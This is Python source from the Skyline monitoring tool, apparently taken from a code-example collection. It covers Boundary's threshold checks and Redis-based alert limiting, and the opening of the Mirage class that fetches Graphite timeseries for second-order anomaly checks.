                    timeseries_dump_dir = "/tmp/skyline/boundary/" + algorithm
                    self.mkdir_p(timeseries_dump_dir)
                    timeseries_dump_file = timeseries_dump_dir + "/" + metric_name + ".json"
                    with open(timeseries_dump_file, 'w+') as f:
                        f.write(str(timeseries))
                        f.close()

                # Check if a metric has its own unique BOUNDARY_METRICS alert
                # tuple, this allows us to paint an entire metric namespace with
                # the same brush AND paint a unique metric or namespace with a
                # different brush or scalpel
                has_unique_tuple = False
                run_tupple = False
                boundary_metric_tuple = (base_name, algorithm, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters)
                wildcard_namespace = True
                for metric_tuple in BOUNDARY_METRICS:
                    if not has_unique_tuple:
                        CHECK_MATCH_PATTERN = metric_tuple[0]
                        check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                        pattern_match = check_match_pattern.match(base_name)
                        if pattern_match:
                            if metric_tuple[0] == base_name:
                                wildcard_namespace = False
                            if not has_unique_tuple:
                                if boundary_metric_tuple == metric_tuple:
                                    has_unique_tuple = True
                                    run_tupple = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('unique_tuple:')
                                        logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                                        logger.info('metric_tuple: %s' % str(metric_tuple))

                if not has_unique_tuple:
                    if wildcard_namespace:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace:')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))
                        run_tupple = True
                    else:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('wildcard_namespace: BUT WOULD NOT RUN')
                            logger.info('boundary_metric_tuple: %s' % str(boundary_metric_tuple))

                if ENABLE_BOUNDARY_DEBUG:
                    logger.info('WOULD RUN run_selected_algorithm = %s' % run_tupple)

                if run_tupple:
                    # Submit the timeseries and settings to run_selected_algorithm
                    anomalous, ensemble, datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm = run_selected_algorithm(
                        timeseries, metric_name,
                        metric_expiration_time,
                        metric_min_average,
                        metric_min_average_seconds,
                        metric_trigger,
                        alert_threshold,
                        metric_alerters,
                        autoaggregate,
                        autoaggregate_value,
                        algorithm
                    )
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug :: analysed - %s' % (metric_name))
                else:
                    anomalous = False
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info('debug :: more unique metric tuple not analysed - %s' % (metric_name))

                # If it's anomalous, add it to list
                if anomalous:
                    anomalous_metric = [datapoint, metric_name, metric_expiration_time, metric_min_average, metric_min_average_seconds, metric_trigger, alert_threshold, metric_alerters, algorithm]
                    self.anomalous_metrics.append(anomalous_metric)
                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

                    # If Crucible or Panorama are enabled determine details
                    determine_anomaly_details = False
                    if settings.ENABLE_CRUCIBLE and settings.BOUNDARY_CRUCIBLE_ENABLED:
                        determine_anomaly_details = True
                    if settings.PANORAMA_ENABLED:
                        determine_anomaly_details = True

                    if determine_anomaly_details:
                        metric_timestamp = str(int(timeseries[-1][0]))
                        from_timestamp = str(int(timeseries[1][0]))
                        timeseries_dir = base_name.replace('.', '/')

                    # If Panorama is enabled - create a Panorama check
                    if settings.PANORAMA_ENABLED:
                        # Note:
                        # The values are enclosed in single quotes intentionally,
                        # as the imp.load_source call results in a shift in the
                        # decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                        added_at = str(int(time()))
                        source = 'graphite'
                        panaroma_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = [\'%s\']\n' \
                                                'triggered_algorithms = [\'%s\']\n' \
                                                'app = \'%s\'\n' \
                                                'source = \'%s\'\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(algorithm), str(algorithm),
                               skyline_app, source, this_host, added_at)

                        # Create an anomaly file with details about the anomaly
                        panaroma_anomaly_file = '%s/%s.%s.txt' % (
                            settings.PANORAMA_CHECK_PATH, added_at,
                            base_name)
                        try:
                            write_data_to_file(
                                skyline_app, panaroma_anomaly_file, 'w',
                                panaroma_anomaly_data)
                            logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                        except:
                            logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
                            logger.info(traceback.format_exc())

                    # If crucible is enabled - save timeseries and create a
                    # crucible check
                    if settings.ENABLE_CRUCIBLE and settings.BOUNDARY_CRUCIBLE_ENABLED:
                        crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                        if not os.path.exists(crucible_anomaly_dir):
                            if python_version == 2:
                                mode_arg = 0o755
                            if python_version == 3:
                                mode_arg = 0o755
                            os.makedirs(crucible_anomaly_dir, mode_arg)

                        # Note:
                        # Due to only one algorithm triggering here the
                        # algorithm related arrays here are a different format
                        # to there output format in analyzer

                        # Note:
                        # The value is enclosed in single quotes intentionally,
                        # as the imp.load_source used in crucible results in a
                        # shift in the decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0

                        crucible_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'anomaly_dir = \'%s\'\n' \
                                                'graphite_metric = True\n' \
                                                'run_crucible_tests = False\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(algorithm),
                               triggered_algorithms, crucible_anomaly_dir,
                               skyline_app, metric_timestamp)

                        # Create an anomaly file with details about the anomaly
                        crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                        with open(crucible_anomaly_file, 'w') as fh:
                            fh.write(crucible_anomaly_data)
                        if python_version == 2:
                            mode_arg = int('0644', 8)
                        if python_version == 3:
                            mode_arg = 0o644
                        os.chmod(crucible_anomaly_file, mode_arg)
                        logger.info('added crucible anomaly file :: %s/%s.txt' % (crucible_anomaly_dir, base_name))

                        # Create timeseries json file with the timeseries
                        json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
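                        # Note: square brackets are swapped for parentheses below, so the
                        # file holds a tuple-style literal of the timeseries rather than
                        # strict JSON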
                        timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                        with open(json_file, 'w') as fh:
                            # timeseries
                            fh.write(timeseries_json)
                        if python_version == 2:
                            mode_arg = int('0644', 8)
                        if python_version == 3:
                            mode_arg = 0o644
                        os.chmod(json_file, mode_arg)
                        logger.info('added crucible timeseries file :: %s/%s.json' % (crucible_anomaly_dir, base_name))

                        # Create a crucible check file
                        crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                        with open(crucible_check_file, 'w') as fh:
                            fh.write(crucible_anomaly_data)
                        if python_version == 2:
                            mode_arg = int('0644', 8)
                        if python_version == 3:
                            mode_arg = 0o644
                        os.chmod(crucible_check_file, mode_arg)
                        logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info("exceptions['Other'] traceback follows:")
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

    def run(self):
        """
        Called when the process initializes.
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error :: failed to remove %s, continuing' % skyline_app_logwait)
                pass

        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error :: bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error :: failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('error :: skyline cannot connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Reset boundary_metrics
            boundary_metrics = []

            # Build boundary metrics
            for metric_name in unique_metrics:
                for metric in BOUNDARY_METRICS:
                    CHECK_MATCH_PATTERN = metric[0]
                    check_match_pattern = re.compile(CHECK_MATCH_PATTERN)
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    pattern_match = check_match_pattern.match(base_name)
                    if pattern_match:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: boundary metric - pattern MATCHED - ' + metric[0] + " | " + base_name)
                        boundary_metrics.append([metric_name, metric[1]])

            if ENABLE_BOUNDARY_DEBUG:
                logger.info('debug :: boundary metrics - ' + str(boundary_metrics))

            if len(boundary_metrics) == 0:
                logger.info('no Boundary metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Spawn processes
            pids = []
            for i in range(1, settings.BOUNDARY_PROCESSES + 1):
                if i > len(boundary_metrics):
                    logger.info('WARNING: Skyline Boundary is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, boundary_metrics))
                pids.append(p)
                p.start()

            # Wait for the spawned processes to finish
            for p in pids:
                p.join()

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.BOUNDARY_ENABLE_ALERTS:
                for anomalous_metric in self.anomalous_metrics:
                    datapoint = str(anomalous_metric[0])
                    metric_name = anomalous_metric[1]
                    base_name = metric_name.replace(FULL_NAMESPACE, '', 1)
                    expiration_time = str(anomalous_metric[2])
                    metric_trigger = str(anomalous_metric[5])
                    alert_threshold = int(anomalous_metric[6])
                    metric_alerters = anomalous_metric[7]
                    algorithm = anomalous_metric[8]
                    if ENABLE_BOUNDARY_DEBUG:
                        logger.info("debug :: anomalous_metric - " + str(anomalous_metric))

                    # Determine how many times has the anomaly been seen if the
                    # ALERT_THRESHOLD is set to > 1 and create a cache key in
                    # redis to keep count so that alert_threshold can be honored
                    if alert_threshold == 0:
                        times_seen = 1
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug :: alert_threshold - " + str(alert_threshold))

                    if alert_threshold == 1:
                        times_seen = 1
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info("debug :: alert_threshold - " + str(alert_threshold))

                    if alert_threshold > 1:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: alert_threshold - ' + str(alert_threshold))
                        anomaly_cache_key_count_set = False
                        anomaly_cache_key_expiration_time = (int(alert_threshold) + 1) * 60
                        anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name)
                        try:
                            anomaly_cache_key_count = self.redis_conn.get(anomaly_cache_key)
                            if not anomaly_cache_key_count:
                                try:
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('debug :: redis no anomaly_cache_key - ' + str(anomaly_cache_key))
                                    times_seen = 1
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info('debug :: redis setex anomaly_cache_key - ' + str(anomaly_cache_key))
                                    self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                    logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                                except Exception as e:
                                    logger.error('error :: redis setex failed :: %s' % str(anomaly_cache_key))
                                    logger.error('error :: could not set key: %s' % e)
                            else:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: redis anomaly_cache_key retrieved OK - ' + str(anomaly_cache_key))
                                anomaly_cache_key_count_set = True
                        except:
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info('debug :: redis failed - anomaly_cache_key retrieval failed - ' + str(anomaly_cache_key))
                            anomaly_cache_key_count_set = False

                        if anomaly_cache_key_count_set:
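                            # The seen count was stored with packb, so unpack it with
                            # msgpack's Unpacker and increment it for this occurrence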
                            unpacker = Unpacker(use_list=False)
                            unpacker.feed(anomaly_cache_key_count)
                            raw_times_seen = list(unpacker)
                            times_seen = int(raw_times_seen[0]) + 1
                            try:
                                self.redis_conn.setex(anomaly_cache_key, anomaly_cache_key_expiration_time, packb(int(times_seen)))
                                logger.info('set anomaly seen key :: %s seen %s' % (anomaly_cache_key, str(times_seen)))
                            except:
                                times_seen = 1
                                logger.error('error :: set anomaly seen key failed :: %s seen %s' % (anomaly_cache_key, str(times_seen)))

                    # Alert the alerters if times_seen > alert_threshold
                    if times_seen >= alert_threshold:
                        if ENABLE_BOUNDARY_DEBUG:
                            logger.info('debug :: times_seen %s is greater than or equal to alert_threshold %s' % (str(times_seen), str(alert_threshold)))
                        for alerter in metric_alerters.split("|"):
                            # Determine alerter limits
                            send_alert = False
                            alerts_sent = 0
                            if ENABLE_BOUNDARY_DEBUG:
                                logger.info('debug :: checking alerter - %s' % alerter)
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: determining alerter_expiration_time for settings')
                                alerter_expiration_time_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_expiration_time'][alerter]
                                alerter_expiration_time = int(alerter_expiration_time_setting)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info('debug :: determined alerter_expiration_time from settings - %s' % str(alerter_expiration_time))
                            except:
                                # Set an arbitrary expiry time if not set
                                alerter_expiration_time = 160
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: could not determine alerter_expiration_time from settings")
                            try:
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: determining alerter_limit from settings")
                                alerter_limit_setting = settings.BOUNDARY_ALERTER_OPTS['alerter_limit'][alerter]
                                alerter_limit = int(alerter_limit_setting)
                                alerter_limit_set = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: determined alerter_limit from settings - %s" % str(alerter_limit))
                            except:
                                alerter_limit_set = False
                                send_alert = True
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: could not determine alerter_limit from settings")

                            # If the alerter_limit is set determine how many
                            # alerts the alerter has sent
                            if alerter_limit_set:
                                alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                try:
                                    alerter_sent_count_key_data = self.redis_conn.get(alerter_sent_count_key)
                                    if not alerter_sent_count_key_data:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: redis no alerter key, no alerts sent for - " + str(alerter_sent_count_key))
                                        alerts_sent = 0
                                        send_alert = True
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: alerts_sent set to %s" % str(alerts_sent))
                                            logger.info("debug :: send_alert set to %s" % str(sent_alert))
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: redis alerter key retrieved, unpacking" + str(alerter_sent_count_key))
                                        unpacker = Unpacker(use_list=False)
                                        unpacker.feed(alerter_sent_count_key_data)
                                        raw_alerts_sent = list(unpacker)
                                        alerts_sent = int(raw_alerts_sent[0])
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: alerter %s alerts sent %s " % (str(alerter), str(alerts_sent)))
                                except:
                                    logger.info("No key set - %s" % alerter_sent_count_key)
                                    alerts_sent = 0
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug :: alerts_sent set to %s" % str(alerts_sent))
                                        logger.info("debug :: send_alert set to %s" % str(send_alert))

                                if alerts_sent < alerter_limit:
                                    send_alert = True
                                    if ENABLE_BOUNDARY_DEBUG:
                                        logger.info("debug :: alerts_sent %s is less than alerter_limit %s" % (str(alerts_sent), str(alerter_limit)))
                                        logger.info("debug :: send_alert set to %s" % str(send_alert))

                            # Send alert
                            alerter_alert_sent = False
                            if send_alert:
                                cache_key = 'last_alert.boundary.%s.%s.%s' % (alerter, base_name, algorithm)
                                if ENABLE_BOUNDARY_DEBUG:
                                    logger.info("debug :: checking cache_key - %s" % cache_key)
                                try:
                                    last_alert = self.redis_conn.get(cache_key)
                                    if not last_alert:
                                        try:
                                            self.redis_conn.setex(cache_key, int(anomalous_metric[2]), packb(int(anomalous_metric[0])))
                                            if ENABLE_BOUNDARY_DEBUG:
                                                logger.info('debug :: key setex OK - %s' % (cache_key))
                                            trigger_alert(alerter, datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                            logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                            alerter_alert_sent = True
                                        except Exception as e:
                                            logger.error('error :: alert failed :: %s - %s - via %s - %s' % (base_name, datapoint, alerter, algorithm))
                                            logger.error('error :: could not send alert: %s' % str(e))
                                            trigger_alert('syslog', datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    else:
                                        if ENABLE_BOUNDARY_DEBUG:
                                            logger.info("debug :: cache_key exists not alerting via %s for %s is less than alerter_limit %s" % (alerter, cache_key))
                                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                                except:
                                    trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                    logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))
                            else:
                                trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                                logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

                            # Update the alerts sent for the alerter cache key,
                            # to allow for alert limiting
                            if alerter_alert_sent and alerter_limit_set:
                                try:
                                    alerter_sent_count_key = 'alerts_sent.%s' % (alerter)
                                    new_alerts_sent = int(alerts_sent) + 1
                                    self.redis_conn.setex(alerter_sent_count_key, alerter_expiration_time, packb(int(new_alerts_sent)))
                                    logger.info('set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))
                                except:
                                    logger.error('error :: failed to set %s - %s' % (alerter_sent_count_key, str(new_alerts_sent)))
                    else:
                        # Always alert to syslog, even if alert_threshold is not
                        # breached or if send_alert is not True
                        trigger_alert("syslog", datapoint, base_name, expiration_time, metric_trigger, algorithm)
                        logger.info('alert sent :: %s - %s - via syslog - %s' % (base_name, datapoint, algorithm))

            # Write anomalous_metrics to static webapp directory
            if len(self.anomalous_metrics) > 0:
                filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP))
                with open(filename, 'w') as fh:
                    # Make it JSONP with a handle_data() function
                    anomalous_metrics = list(self.anomalous_metrics)
                    anomalous_metrics.sort(key=operator.itemgetter(1))
                    fh.write('handle_data(%s)' % anomalous_metrics)

            run_time = time() - now
            total_metrics = str(len(boundary_metrics))
            total_analyzed = str(len(boundary_metrics) - sum(exceptions.values()))
            total_anomalies = str(len(self.anomalous_metrics))

            # Log progress
            logger.info('seconds to run    :: %.2f' % run_time)
            logger.info('total metrics     :: %s' % total_metrics)
            logger.info('total analyzed    :: %s' % total_analyzed)
            logger.info('total anomalies   :: %s' % total_anomalies)
            logger.info('exception stats   :: %s' % exceptions)
            logger.info('anomaly breakdown :: %s' % anomaly_breakdown)

            # Log to Graphite
            graphite_run_time = '%.2f' % run_time
            send_metric_name = skyline_app_graphite_namespace + '.run_time'
            send_graphite_metric(skyline_app, send_metric_name, graphite_run_time)

            send_metric_name = skyline_app_graphite_namespace + '.total_analyzed'
            send_graphite_metric(skyline_app, send_metric_name, total_analyzed)

            send_metric_name = skyline_app_graphite_namespace + '.total_anomalies'
            send_graphite_metric(skyline_app, send_metric_name, total_anomalies)

            send_metric_name = skyline_app_graphite_namespace + '.total_metrics'
            send_graphite_metric(skyline_app, send_metric_name, total_metrics)
            for key, value in exceptions.items():
                send_metric_name = '%s.exceptions.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))
            for key, value in anomaly_breakdown.items():
                send_metric_name = '%s.anomaly_breakdown.%s' % (skyline_app_graphite_namespace, key)
                send_graphite_metric(skyline_app, send_metric_name, str(value))

            # Check canary metric
            raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC)
            if raw_series is not None:
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)
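                # time_human is the span of the canary timeseries in hours; projected
                # scales this run's duration to a notional 24 hours of data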
                time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600
                projected = 24 * (time() - now) / time_human

                logger.info('canary duration   :: %.2f' % time_human)
                send_metric_name = skyline_app_graphite_namespace + '.duration'
                send_graphite_metric(skyline_app, send_metric_name, str(time_human))

                send_metric_name = skyline_app_graphite_namespace + '.projected'
                send_graphite_metric(skyline_app, send_metric_name, str(projected))

            # Reset counters
            self.anomalous_metrics[:] = []

            # Only run once per BOUNDARY_OPTIMUM_RUN_DURATION seconds
            process_runtime = time() - now
            try:
                boundary_optimum_run_duration = settings.BOUNDARY_OPTIMUM_RUN_DURATION
            except:
                boundary_optimum_run_duration = 60

            if process_runtime < boundary_optimum_run_duration:
                sleep_for = (boundary_optimum_run_duration - process_runtime)
                logger.info('sleeping for %.2f seconds' % sleep_for)
                sleep(sleep_for)
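
The alert_threshold handling above keeps a per algorithm, per metric counter in Redis so an alerter only fires once an anomaly has been seen alert_threshold times inside the key's expiry window. Below is a minimal, standalone sketch of that counter pattern, assuming a local Redis socket and the msgpack and redis Python packages; the helper name, socket path and metric name are illustrative and not part of Boundary itself.

from msgpack import Unpacker, packb
from redis import StrictRedis


def anomaly_times_seen(redis_conn, algorithm, base_name, alert_threshold):
    # Keep the count alive slightly longer than the threshold window
    anomaly_cache_key = 'anomaly_seen.%s.%s' % (algorithm, base_name)
    expiration = (int(alert_threshold) + 1) * 60
    raw_count = redis_conn.get(anomaly_cache_key)
    if not raw_count:
        times_seen = 1
    else:
        # The stored count is msgpack encoded, so unpack and increment it
        unpacker = Unpacker(use_list=False)
        unpacker.feed(raw_count)
        times_seen = int(list(unpacker)[0]) + 1
    redis_conn.setex(anomaly_cache_key, expiration, packb(int(times_seen)))
    return times_seen


# Usage sketch - only alert once the anomaly has been seen often enough
# redis_conn = StrictRedis(unix_socket_path='/tmp/redis.sock')
# if anomaly_times_seen(redis_conn, 'detect_drop_off_cliff', 'stats.foo.requests', 3) >= 3:
#     pass  # trigger_alert(...)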
Ejemplo n.º 49
0
class Mirage(Thread):
    def __init__(self, parent_pid):
        """
        Initialize the Mirage
        """
        super(Mirage, self).__init__()
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        # Create the Redis connection here so run() can ping it straight away
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.anomalous_metrics = Manager().list()
        self.mirage_exceptions_q = Queue()
        self.mirage_anomaly_breakdown_q = Queue()
        self.not_anomalous_metrics = Manager().list()
        self.metric_variables = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Self explanatory
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def mkdir_p(self, path):
        try:
            os.makedirs(path)
            return True
        # Python >2.5
        except OSError as exc:
            if exc.errno == errno.EEXIST and os.path.isdir(path):
                pass
            else:
                raise

    def surface_graphite_metric_data(self, metric_name, graphite_from, graphite_until):
        # We use absolute time so that if there is a lag in mirage the correct
        # timeseries data is still surfaced relevant to the anomalous datapoint
        # timestamp
        if settings.GRAPHITE_PORT != '':
            url = '%s://%s:%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                str(settings.GRAPHITE_PORT), graphite_from, graphite_until,
                metric_name)
        else:
            url = '%s://%s/render/?from=%s&until=%s&target=%s&format=json' % (
                settings.GRAPHITE_PROTOCOL, settings.GRAPHITE_HOST,
                graphite_from, graphite_until, metric_name)
        r = requests.get(url)
        js = r.json()
        datapoints = js[0]['datapoints']

        converted = []
        for datapoint in datapoints:
            try:
                new_datapoint = [float(datapoint[1]), float(datapoint[0])]
                converted.append(new_datapoint)
            except:
                continue

        parsed = urlparse.urlparse(url)
        target = urlparse.parse_qs(parsed.query)['target'][0]

        metric_data_folder = settings.MIRAGE_DATA_FOLDER + "/" + target
        self.mkdir_p(metric_data_folder)
        with open(metric_data_folder + "/" + target + '.json', 'w') as f:
            # The with block closes the file, no explicit close is needed
            f.write(json.dumps(converted))
        return True

    def load_metric_vars(self, filename):
        if os.path.isfile(filename):
            f = open(filename)
            global metric_vars
            metric_vars = imp.load_source('metric_vars', '', f)
            f.close()
            return True

        return False

    def spin_process(self, i, run_timestamp):
        """
        Assign a metric for a process to analyze.
        """

        # Discover metric to analyze
        metric_var_files = [f for f in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f))]

        # Check if this process is unnecessary
        if len(metric_var_files) == 0:
            return

        metric_var_files_sorted = sorted(metric_var_files)
        metric_check_file = '%s/%s' % (
            settings.MIRAGE_CHECK_PATH, str(metric_var_files_sorted[0]))

        # Load metric variables
        self.load_metric_vars(metric_check_file)

        # Test metric variables
        if len(metric_vars.metric) == 0:
            return
        else:
            metric = metric_vars.metric
            metric_name = ['metric_name', metric_vars.metric]
            self.metric_variables.append(metric_name)
        if len(metric_vars.value) == 0:
            return
        else:
            metric_value = ['metric_value', metric_vars.value]
            self.metric_variables.append(metric_value)
        if len(metric_vars.hours_to_resolve) == 0:
            return
        else:
            hours_to_resolve = ['hours_to_resolve', metric_vars.hours_to_resolve]
            self.metric_variables.append(hours_to_resolve)
        if len(metric_vars.metric_timestamp) == 0:
            return
        else:
            metric_timestamp = ['metric_timestamp', metric_vars.metric_timestamp]
            self.metric_variables.append(metric_timestamp)

        # Ignore any metric check that is older than MIRAGE_STALE_SECONDS
        int_metric_timestamp = int(metric_vars.metric_timestamp)
        int_run_timestamp = int(run_timestamp)
        metric_timestamp_age = int_run_timestamp - int_metric_timestamp
        if metric_timestamp_age > settings.MIRAGE_STALE_SECONDS:
            logger.info('stale check       :: %s check request is %s seconds old - discarding' % (metric_vars.metric, metric_timestamp_age))
            # Remove the metric check file and discard the stale check
            if os.path.exists(metric_check_file):
                os.remove(metric_check_file)
                logger.info('removed %s' % (metric_check_file))
            else:
                logger.info('could not remove %s' % (metric_check_file))
            return

        # Calculate hours second order resolution to seconds
        second_order_resolution_seconds = int(metric_vars.hours_to_resolve) * 3600

        # Calculate graphite from and until parameters from the metric timestamp
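        # Graphite's render API accepts absolute times in the HH:MM_YYYYMMDD format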
        graphite_until = datetime.datetime.fromtimestamp(int(metric_vars.metric_timestamp)).strftime('%H:%M_%Y%m%d')
        int_second_order_resolution_seconds = int(second_order_resolution_seconds)
        second_resolution_timestamp = int_metric_timestamp - int_second_order_resolution_seconds
        graphite_from = datetime.datetime.fromtimestamp(int(second_resolution_timestamp)).strftime('%H:%M_%Y%m%d')

        # Remove any old json file related to the metric
        metric_json_file = '%s/%s/%s.json' % (
            settings.MIRAGE_DATA_FOLDER, str(metric_vars.metric),
            str(metric_vars.metric))
        try:
            os.remove(metric_json_file)
        except OSError:
            pass

        # Get data from graphite
        logger.info(
            'retrieve data     :: surfacing %s timeseries from graphite for %s seconds' % (
                metric_vars.metric, second_order_resolution_seconds))
        self.surface_graphite_metric_data(metric_vars.metric, graphite_from, graphite_until)

        # Check there is a json timeseries file to test
        if not os.path.isfile(metric_json_file):
            logger.error(
                'error :: retrieve failed - failed to surface %s timeseries from graphite' % (
                    metric_vars.metric))
            # Remove metric check file
            try:
                os.remove(metric_check_file)
            except OSError:
                pass
            return
        else:
